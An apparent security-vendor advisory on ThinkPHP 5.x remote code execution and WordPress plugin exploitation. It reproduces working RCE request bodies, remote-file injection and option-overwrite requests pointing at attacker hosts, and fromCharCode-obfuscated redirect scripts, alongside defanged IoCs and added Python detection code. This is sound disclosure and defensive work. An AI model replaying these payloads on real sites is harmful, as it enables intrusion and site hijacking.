ThinkPHP 5.x – Remote Code Execution Actively Exploited...

Earlier this year, we noticed an increase in attacks aiming at ThinkPHP. ThinkPHP is a PHP framework that is very popular in Asia. If you keep track of your site’s activity, the following log may look familiar:

POST: /index.php?s=captcha HTTP/1.1
Data: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig

In December 2018, a working exploit was released for versions v5.0.23 and v5.1.31. The ThinkPHP team then released a new version that partially fixed the problem. Here is a snippet of the patch:

$method = strtoupper($_POST[Config::get('var_method')]); 
- $this->{$this->method}($_POST); 
+ if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) { 
+ $this->method = $method; 
+ $this->{$this->method}($_POST); 
+ } 
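
Review bot: the `in_array()` check on the added `if` line has no else branch, so a request whose `_method` value is outside the list is silently skipped rather than rejected or logged; consider returning an error there, and pass `true` as the third argument to `in_array()` so the comparison is strict. The allowed branch also still hands the entire `$_POST` array to the invoked method, so the other request fields are not validated by this change, and the context line reads `$_POST[Config::get('var_method')]` without first checking that the key is set and is a string.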

Remote Code Execution on ThinkPHP

Basically, they restricted the method parameter to legitimate values, because later in the code the function filterValue() passes the filter parameter directly to the PHP function call_user_func(), leading to remote code execution (RCE). Unfortunately, after reversing the patch, attackers found that the filterValue() function can still be reached with an even simpler payload:

data: a=system&b=id&_method=filter  (some important data and more payloads were skipped here)
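
A detection check for the two request bodies shown above, as an added example (not code from ThinkPHP or from the original post): it applies the patch's verb allow-list to the `_method` field and flags any parameter whose value names a PHP callable. The function name `inspect_body`, the callable list and the benign sample are assumptions made for illustration.

```python
from urllib.parse import parse_qsl

# HTTP verbs the patch above accepts for the method-override field.
ALLOWED_OVERRIDES = {"GET", "POST", "DELETE", "PUT", "PATCH"}
# Field name as it appears in the logged payloads.
OVERRIDE_FIELD = "_method"
# Assumption: a short, non-exhaustive list of PHP callables worth flagging.
SUSPECT_CALLABLES = {"system", "exec", "passthru", "shell_exec", "popen",
                     "proc_open", "assert", "call_user_func"}


def inspect_body(body):
    """Return (rule, parameter, value) tuples for a form-encoded POST body."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        base = name.split("[", 1)[0]      # "filter[]" -> "filter"
        val = value.strip()
        # Rule 1: the override field must name a real HTTP verb.
        if base == OVERRIDE_FIELD and val.upper() not in ALLOWED_OVERRIDES:
            findings.append(("bad-override", name, val))
        # Rule 2: no parameter value should be a bare PHP callable name.
        if val.lower() in SUSPECT_CALLABLES:
            findings.append(("callable-value", name, val))
    return findings


# The two request bodies quoted in this post.
PAGE_SAMPLES = [
    "_method=__construct&filter[]=system&method=get"
    "&server[REQUEST_METHOD]=uname&ipconfig",
    "a=system&b=id&_method=filter",
]
# Constructed benign body: a legitimate method override.
BENIGN = "_method=put&title=hello"

if __name__ == "__main__":
    for body in PAGE_SAMPLES + [BENIGN]:
        print(inspect_body(body) or "clean", "<-", body)
```

Rule 1 alone catches both logged payloads; rule 2 is what still fires if a later variant stops using the override field.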

Affected Versions of ThinkPHP

Versions 5.1.x / 5.2.x are still affected. Since there is no strict validation of user input, bots were programmed to use a new variety of payloads to evade WAFs and previous fixes.

Attackers are exploiting this vulnerability to upload cryptominers. The following are the most recent domains hosting malicious binaries:

hxxp:// love[.]thotiana.live/bins/x86[.]bot
hxxp:// fid[.]hognoob[.]se/download[.]exe

Conclusion

As always, we recommend keeping your software up to date and using a WAF as a second layer of protection, since developers sometimes fall short of solving security issues.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Social Warfare Vulnerability Probes

After a recent disclosure of the Social Warfare plugin vulnerability, we’ve seen massive attacks that inject malicious JavaScript into the plugin options.

The vulnerability has been patched in version 3.5.3 of the plugin, so not all sites with that plugin are now vulnerable. To find sites that are actually vulnerable, hackers scan the Internet and probe the sites. However, instead of using the file with code that actually changes the settings, they just specify a file with PHP code that returns a predefined text on vulnerable sites.

Here are some of the URLs of such probe files detected by our firewall:

hxxp://thehuglaw[.]com/cache/wq.txt
hxxp://www.fdqyj[.]com/lang/wp2.txt
hxxp://www.fdqyj[.]com/lang/wp3.txt
hxxp://kidsinthehouse[.]com/all-backup/libraries/share/fonts/tresz.txt
hxxp://kidsinthehouse[.]com/all-backup/libraries/share/fonts/551.txt
hxxps://gist.githubusercontent.com/kolzdnoy71/ef026d1b2587371fdc6b28a9a21249dd/raw/628d8b376d2122580d6fcbc63c41ea9778473b8f/gistfile1.txt
...

They have very simple PHP code inside <pre> tags. For example:

<pre>print(7457737+736723);</pre>

Or

<pre>system('echo dfdffg34dfg')</pre>

Some of these files are hosted on compromised third-party sites and, at this point, some of them have already been removed.

Hacked sites are not the only option used by the attackers. We’ve seen them using Pastebin links (Pastebin removes them after abuse reports). Another option, which you can see in the list above, is GitHub, specifically its Gist service.

In the case of the above Gist link, the user who created it (kolzdnoy71) joined GitHub only on March 27, 2019.

Multi-Vector Attack in Server Logs

We recently noticed an increase in suspicious requests in our logs, which reveals a planned attack against the Social Warfare plugin. Bad actors added this brand new exploit to an existing campaign, which includes other vulnerable plugins and themes, to inject malicious scripts.


Plugins and themes under attack

Some of the Payloads Used by Bots

WordPress GDPR Compliance

145.239.54.77 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22siteurl%22%2C%22value%22+%3A%22https%3A%2F%2Fverybeatifulpear .com%2Fjava.js%3Ft%3D2%26%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Newspaper WP Theme

31.208.43.209 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fredrentalservice .com [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Social Warfare Plugin

91.134.215.233 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=hxxp://109.234 .34 .22/mv.txt HTTP/1.1"

Smart Google Code Inserter

1.208.43.209 - action=savegooglecode&sgcgoogleanalytic=%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+...skipped...+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E&sgcwebtools= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

The code redirects to hxxps://redrentalservice[.]com/?t4

Education WP Theme

34.194.221.173 - action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=X%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+114%2C+101%2C+110%2C+116%2C+97%2C+108%2C+115%2C+101%2C+114%2C+118%2C+105%2C+99%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+63%2C+116%2C+52%2C...skipped...97%2C+59%2C+32%2C+119%2C+105%2C+110%2C+100%2C+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E%3Cscript%3E "POST /wp-admin/admin-ajax.php
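
A log-triage sketch for the request shapes listed above, as an added example (not code from the original post or from any of the plugins): it flags overwrites of the `siteurl`/`home` options, a remote `swp_url`, and decodes `String.fromCharCode(...)` runs so the injected script can be read. The function names and the sample requests are constructed for illustration, with placeholder hosts.

```python
import json
import re
from urllib.parse import parse_qsl, quote_plus

CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
URL_OPTIONS = {"siteurl", "home"}  # WordPress options targeted in the logs above


def decode_charcodes(text):
    """Return the plaintext of every String.fromCharCode(...) call in text."""
    return ["".join(chr(int(n)) for n in m.group(1).split(",")
                    if n.strip() and int(n) < 0x110000)
            for m in CHARCODE_RE.finditer(text)]


def triage(params):
    """Classify one logged query string or form-encoded POST body."""
    findings = []
    for name, value in parse_qsl(params, keep_blank_values=True):
        if name == "swp_url" and re.match(r"https?://", value, re.I):
            findings.append(("remote-options-file", value))
        opt = re.fullmatch(r"wp_option\[(\w+)\]", name)
        if opt and opt.group(1) in URL_OPTIONS:
            findings.append(("option-overwrite", opt.group(1), value))
        if name == "data":  # JSON blob, as in the GDPR Compliance request
            try:
                blob = json.loads(value)
            except ValueError:
                blob = None
            if isinstance(blob, dict) and str(blob.get("option")) in URL_OPTIONS:
                findings.append(("option-overwrite", blob["option"], blob.get("value")))
        for script in decode_charcodes(value):
            findings.append(("obfuscated-script", script))
    return findings


# Constructed samples: same request shapes as the logs, placeholder hosts.
JS = 'var a = "https://redirect.example/?x"; window.location.href=a;'
CODES = ", ".join(str(ord(c)) for c in JS)
SAMPLES = {
    "gdpr": "action=wpgdprc_process_action&data=" + quote_plus(
        '{"type":"save_setting","append":false,"option":"siteurl",'
        '"value":"https://cdn.example/java.js"}') + "&security=",
    "theme": "action=td_ajax_update_panel&wp_option%5Bhome%5D="
             + quote_plus("https://redirect.example"),
    "swp": "swp_debug=load_options&swp_url=http://192.0.2.10/probe.txt",
    "inserter": "action=savegooglecode&sgcgoogleanalytic=" + quote_plus(
        f"<script language=javascript>eval(String.fromCharCode({CODES}));</script>"),
}
```

Calling `triage(SAMPLES["inserter"])` returns the decoded redirect script, which is the quickest way to see where an injected `fromCharCode` payload sends visitors.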

Malicious Domains and IPs:

IPs:

31.208.43.209
91.134.215.233
34.194.221.173
128.199.114.0
162.243.1.231
145.239.54.77
185.136.85.47
222.73.242.180
109.234.34.22

URLs:

hxxps://redrentalservice[.]com/tpn1.js
hxxp://raiserate[.]com/mv.txt
hxxp://109.234 .34 .22/mv.txt
hxxps://verybeatifulpear[.]com
hxxps://blueeyeswebsite[.]com
hxxp://r-y-p[.]org/options.txt
hxxps://teutorrent.com/wp-includes/js/javascript-mini.js